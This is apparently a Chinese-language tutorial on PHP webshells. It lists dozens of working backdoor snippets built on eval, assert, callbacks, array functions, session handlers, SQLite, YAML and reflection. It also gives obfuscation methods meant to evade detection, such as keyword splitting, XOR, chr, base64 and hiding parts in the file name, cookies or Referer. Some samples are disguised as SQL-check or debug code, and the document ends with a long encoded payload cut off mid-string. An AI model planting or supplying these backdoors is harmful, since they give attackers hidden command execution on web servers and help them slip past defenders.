关于PHP中的webshell

一、webshell简介

webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。黑客在入侵了一个网站后，通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起，然后就可以使用浏览器来访问asp或者php后门，得到一个命令执行环境，以达到控制网站服务器的目的。

顾名思义，“web”的含义是显然需要服务器开放web服务，“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现，也有人称之为网站的后门工具。

二、webshell分类

1、eval

接受一个参数，将字符串作为PHP代码执行

eval($_POST[1]);

2、assert

一般接受一个参数，php 5.4.8版本后可以接受两个参数

assert($_REQUEST[l])

3、正则匹配类

preg_replace/ mb_ereg_replace/preg_filter等

4、文件包含类

include/include_once/require/require_once/file_get_contents

5、回调函数

call_user_func

call_user_func('assert', $_REQUEST['pass']);

//或者

$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_filter($arr, base64_decode($e))

三、webshell变种

assert 和 eval 基本上都被用烂了，分分钟就被检查出来了，所以网上有很多种变种，可以做后门的函数一般包含以下几个关键词：1、 callable  2、mixed $options  3、callback  4、handler

下面是具体的变种，更具隐蔽性

1、无明显回调

ob_start('assert');
echo $_REQUEST['pass'];
ob_end_flush();

2、单个参数

$e = $_REQUEST['e'];
register_shutdown_function($e, $_REQUEST['pass']);

或者

$e = $_REQUEST['e'];
declare(ticks=1);
register_tick_function ($e, $_REQUEST['pass']);

或者

filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert'));
filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));

只要指定过滤方法为回调（FILTER_CALLBACK），且option为assert即可。

3、回调函数

call_user_func('assert', $_REQUEST['pass']);
call_user_func_array('assert', array($_REQUEST['pass']));

或者

<?php
error_reporting(0);
if ($_REQUEST['session'] == 1) {
    $session = chr(97) . chr(115) . chr(115) . chr(101) . chr(114) . chr(116); //assert
    // open第一个被调用，类似 类的构造函数
    function open($save_path, $session_name) {
    }
    // close最后一个被调用，类似 类的析构函数
    function close() {
    }
    // 得到session id后，等价于执行assert($_REQUEST[phpcms])
    session_id($_REQUEST[phpcms]);
    function write($id, $sess_data) {
    }
    function destroy($id) {
    }
    function gc() {
    }
    // 第三个参数为read  read(string $sessionId)
    session_set_save_handler("open", "close", $session, "write", "destroy", "gc");
    @session_start(); //会话打开的时候，自动调用回调函数
    $cloud = $_SESSION["d"] = "c"; // 这句话没用
}
?>

4、数组

$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_filter($arr, base64_decode($e))

或者

$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_map(base64_decode($e), $arr);

或者

$pass= "LandGrey";
array_udiff_assoc(array($_REQUEST[$pass]), array(1), "assert");

或者

$pass= "LandGrey";
$ch = explode(".","hello.ass.world.er.t");
array_intersect_ukey(array($_REQUEST[$pass] => 1), array(1), $ch[1].$ch[3].$ch[4]);

或者

$_clasc = $_REQUEST['mod'];
$arr = array($_POST['bato'] => '|.*|e',);
@array_walk_recursive($arr, $_clasc, '');　

5、把部分信息放在代码以外

比如：脚本名称、header 中

$password = "LandGrey";
$key = substr(__FILE__,-5,-4);
${"LandGrey"} =  $key."Land!";
$f = pack("H*", "13"."3f120b1655") ^ $LandGrey;
array_intersect_uassoc (array($_REQUEST[$password] => ""), array(1), $f);

将脚本命名为scanner.php, 硬编码脚本最后一位字符为"r"，就不会被平台检测到

或者

$password = "LandGrey";
$ch = $_COOKIE["set-domain-name"];
array_intersect_ukey(array($_REQUEST[$password] => 1), array(1), $ch."ert");

Cookie: set-domain-name=ass;

或者

$password = "LandGrey";
$wx = substr($_SERVER["HTTP_REFERER"],-7,-4);
forward_static_call_array($wx."ert", array($_REQUEST[$password]));

Referer: http%3a//www.target.com/ass.php

6、数据库操作与第三方库中的回调后门

$e = $_REQUEST['e'];
$db = new PDO('sqlite:sqlite.db3');
$db->sqliteCreateFunction('myfunc', $e, 1);
$sth = $db->prepare("SELECT myfunc(:exec)");
$sth->execute(array(':exec' => $_REQUEST['pass']));

可以注册一个sqlite函数，使之与assert功能相同。当执行这个sql语句的时候，就等于执行了assert

$str = urlencode($_REQUEST['pass']);
$yaml = <<<EOD
greeting: !{$str} "|.+|e"
EOD;
$parsed = yaml_parse($yaml, 0, $cnt, array("!{$_REQUEST['pass']}" => 'preg_replace'));

上面是使用php_yaml

$mem = new Memcache();
$re = $mem->addServer('localhost', 11211, TRUE, 100, 0, -1, TRUE, create_function('$a,$b,$c,$d,$e', 'return assert($a);'));
$mem->connect($_REQUEST['pass'], 11211, 0);

还有php_memcached

7、反射

<?php
    /**
    * eva
    * l($_POS
    * T["c"]);
    * asse
    * rt
    */
    class TestClass { }
    $rc = new ReflectionClass('TestClass');
    $str = $rc->getDocComment();
    $payload = substr($str,strpos($str,'ev'),3);
    $payload .= substr($str,strpos($str,'l('),7);
    $payload .= substr($str,strpos($str,'T['),8);
    $exe = substr($str, strpos($str, 'as'), 4);
    $exe .= substr($str, strpos($str, 'rt'), 2);
    
    $exe($payload);
?>

四、隐藏关键词

1、混淆

<?php
//pwd=addimg
$sss = "ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lnS0NCcGMzTmxkQ2dnSkY5U1JWRlZSVk5VV3lkd1lYTnpKMTBnS1NsN1FHVjJZV3dvSUdKaGMyVTJORjlrWldOdlpHVW9JQ1JmVWtWUlZVVlRWRnNuY0dGemN5ZGRJQ2tnS1R0OVpXeHpaWHRBWlhaaGJDZ2dKRjlTUlZGVlJWTlVXeWRoWkdScGJXY25YU0FwTzMwPSIpKQ==";
function CheckSQL( &$val ){ 
    $v = "select|update|union|set|where|order|and|or";
    $val = base64_decode( $val );
}
CheckSQL( $sss );
preg_replace('/uploadsafe.inc.php/e','@'.$sss, 'uploadsafe.inc.php');
?>

　或者

<?php
$MMIC= $_GET['tid']?$_GET['tid']:$_GET['fid'];
if($MMIC >1000000){
  die('404');
}
if (isset($_POST["x70x61x73x73"]) && isset($_POST["x63x68x65x63x6b"]))
{
  $__PHP_debug   = array (
    'ZendName' => '70,61,73,73', 
    'ZendPort' => '63,68,65,63,6b',
    'ZendSalt' => '792e19812fafd57c7ac150af768d95ce'
  );
 
  $__PHP_replace = array (
    pack('H*', join('', explode(',', $__PHP_debug['ZendName']))),
    pack('H*', join('', explode(',', $__PHP_debug['ZendPort']))),
    $__PHP_debug['ZendSalt']
  );
 
  $__PHP_request = &$_POST;
  $__PHP_token   = md5($__PHP_request[$__PHP_replace[0]]);
 
  if ($__PHP_token == $__PHP_replace[2])
  {
    $__PHP_token = preg_replace (
      chr(47).$__PHP_token.chr(47).chr(101),
      $__PHP_request[$__PHP_replace[1]],
      $__PHP_token
    );
 
    unset (
      $__PHP_debug,
      $__PHP_replace,
      $__PHP_request,
      $__PHP_token
    );
 
    if(!defined('_DEBUG_TOKEN')) exit ('Get token fail!');
 
  }
}

2、反引号

<?php 
$cmd =base64_decode('dmVy='); // ver
echo `$cmd`. `$_GET[username]`;  // ``反引号的作用相当于shell_exec,执行系统命令
//或
$var = `net user`;
echo "$var";
?>　

3、XOR

<?php
    @$_++; // $_ = 1
    $__=("#"^"|"); // $__ = _
    $__.=("."^"~"); // _P
    $__.=("/"^"`"); // _PO
    $__.=("|"^"/"); // _POS
    $__.=("{"^"/"); // _POST 
    ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
?>

4、加号

<?php
$num = +"";
$num++; $num++; $num++; $num++;
$four = $num; // 4
$num++; $num++;
$six = $num; // 6
$_="";
$_[+$_]++;  // +""为0
$_=$_.""; // $_为字符串"Array"
$___=$_[+""];//A
$____=$___;
$____++;//B
$_____=$____;
$_____++;//C
$______=$_____;
$______++;//D
$_______=$______;
$_______++;//E
$________=$_______;
$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;//O
$_________=$________;
$_________++;$_________++;$_________++;$_________++;//S
$_=$____.$___.$_________.$_______.$six.$four.'_'.$______.$_______.$_____.$________.$______.$_______;
$________++;$________++;$________++;//R
$_____=$_________;
$_____++;//T
$__=$___.$_________.$_________.$_______.$________.$_____;
$__($_("ZXZhbCgkX1BPU1RbY21kXSk=")); 
//ASSERT(BASE64_DECODE("ZXZhbCgkX1BPU1RbY21kXSk="));  
//ASSERT(eval($_POST[cmd]));  
?>

5、函数

<?php 
 $a=@strrev(ecalper_gerp); 
 $b=@strrev(edoced_46esab);  
 echo @$a($b(L3h4L2Ug),$_POST[jc],axxa); //    /xx/e
?>

6、chr

<?php 
assert(chr(97).chr(115).chr(115).chr(101).chr(114).chr(116).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(120).chr(93).chr(41)); // chr解出来是assert($_POST[x])，不能替换成eval(chr(97).chr(115)
?>

7、session_set_save_handler

<?php
error_reporting(0);
if ($_REQUEST['session'] == 1) {
    $session = chr(97) . chr(115) . chr(115) . chr(101) . chr(114) . chr(116); //assert
    // open第一个被调用，类似 类的构造函数
    function open($save_path, $session_name) {
    }
    // close最后一个被调用，类似 类的析构函数
    function close() {
    }
    // 得到session id后，等价于执行assert($_REQUEST[phpcms])
    session_id($_REQUEST[phpcms]);
    function write($id, $sess_data) {
    }
    function destroy($id) {
    }
    function gc() {
    }
    // 第三个参数为read  read(string $sessionId)
    session_set_save_handler("open", "close", $session, "write", "destroy", "gc");
    @session_start(); //会话打开的时候，自动调用回调函数
    $cloud = $_SESSION["d"] = "c"; // 这句话没用
}
?>

8、引号

<?php
$LMsW="p"."r"."e"."g"."_r"."epl"."a"."ce";
$LMsW("/.*/e","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